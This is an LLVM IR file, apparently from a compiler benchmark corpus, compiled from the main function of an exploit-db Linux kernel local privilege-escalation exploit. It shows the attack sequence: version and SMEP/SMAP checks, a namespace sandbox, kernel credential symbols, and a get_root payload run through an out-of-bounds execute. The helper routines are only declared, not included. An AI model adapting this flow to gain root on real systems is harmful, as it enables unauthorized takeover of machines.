; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_43418.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_43418.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [14 x i8] c"[.] starting\0A\00", align 1
@.str.1 = private unnamed_addr constant [41 x i8] c"[.] checking distro and kernel versions\0A\00", align 1
@.str.2 = private unnamed_addr constant [31 x i8] c"[~] done, versions looks good\0A\00", align 1
@.str.3 = private unnamed_addr constant [28 x i8] c"[.] checking SMEP and SMAP\0A\00", align 1
@.str.4 = private unnamed_addr constant [22 x i8] c"[~] done, looks good\0A\00", align 1
@.str.5 = private unnamed_addr constant [34 x i8] c"[.] setting up namespace sandbox\0A\00", align 1
@.str.6 = private unnamed_addr constant [36 x i8] c"[~] done, namespace sandbox set up\0A\00", align 1
@.str.7 = private unnamed_addr constant [30 x i8] c"[.] commit_creds:        %lx\0A\00", align 1
@COMMIT_CREDS = common dso_local global i32 0, align 4
@.str.8 = private unnamed_addr constant [30 x i8] c"[.] prepare_kernel_cred: %lx\0A\00", align 1
@PREPARE_KERNEL_CRED = common dso_local global i32 0, align 4
@get_root = common dso_local global i32 0, align 4
@.str.9 = private unnamed_addr constant [27 x i8] c"[.] executing payload %lx\0A\00", align 1
@.str.10 = private unnamed_addr constant [30 x i8] c"[~] done, should be root now\0A\00", align 1
@KERNEL_BASE = common dso_local global i32 0, align 4
@XCHG_EAX_ESP_RET = common dso_local global i64 0, align 8

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i64, align 8
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %7 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([14 x i8], [14 x i8]* @.str, i64 0, i64 0))
  %8 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([41 x i8], [41 x i8]* @.str.1, i64 0, i64 0))
  %9 = call i32 (...) @detect_versions()
  %10 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([31 x i8], [31 x i8]* @.str.2, i64 0, i64 0))
  %11 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([28 x i8], [28 x i8]* @.str.3, i64 0, i64 0))
  %12 = call i32 (...) @check_smep_smap()
  %13 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([22 x i8], [22 x i8]* @.str.4, i64 0, i64 0))
  %14 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([34 x i8], [34 x i8]* @.str.5, i64 0, i64 0))
  %15 = call i32 (...) @setup_sandbox()
  %16 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([36 x i8], [36 x i8]* @.str.6, i64 0, i64 0))
  %17 = load i32, i32* @COMMIT_CREDS, align 4
  %18 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([30 x i8], [30 x i8]* @.str.7, i64 0, i64 0), i32 %17)
  %19 = load i32, i32* @PREPARE_KERNEL_CRED, align 4
  %20 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([30 x i8], [30 x i8]* @.str.8, i64 0, i64 0), i32 %19)
  store i64 ptrtoint (i32* @get_root to i64), i64* %6, align 8
  %21 = load i64, i64* %6, align 8
  %22 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.9, i64 0, i64 0), i64 %21)
  %23 = load i64, i64* %6, align 8
  %24 = call i32 @oob_execute(i64 %23)
  %25 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([30 x i8], [30 x i8]* @.str.10, i64 0, i64 0))
  %26 = call i32 (...) @check_root()
  ret i32 0
}

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i32 @detect_versions(...) #1

declare dso_local i32 @check_smep_smap(...) #1

declare dso_local i32 @setup_sandbox(...) #1

declare dso_local i32 @oob_execute(i64) #1

declare dso_local i32 @check_root(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
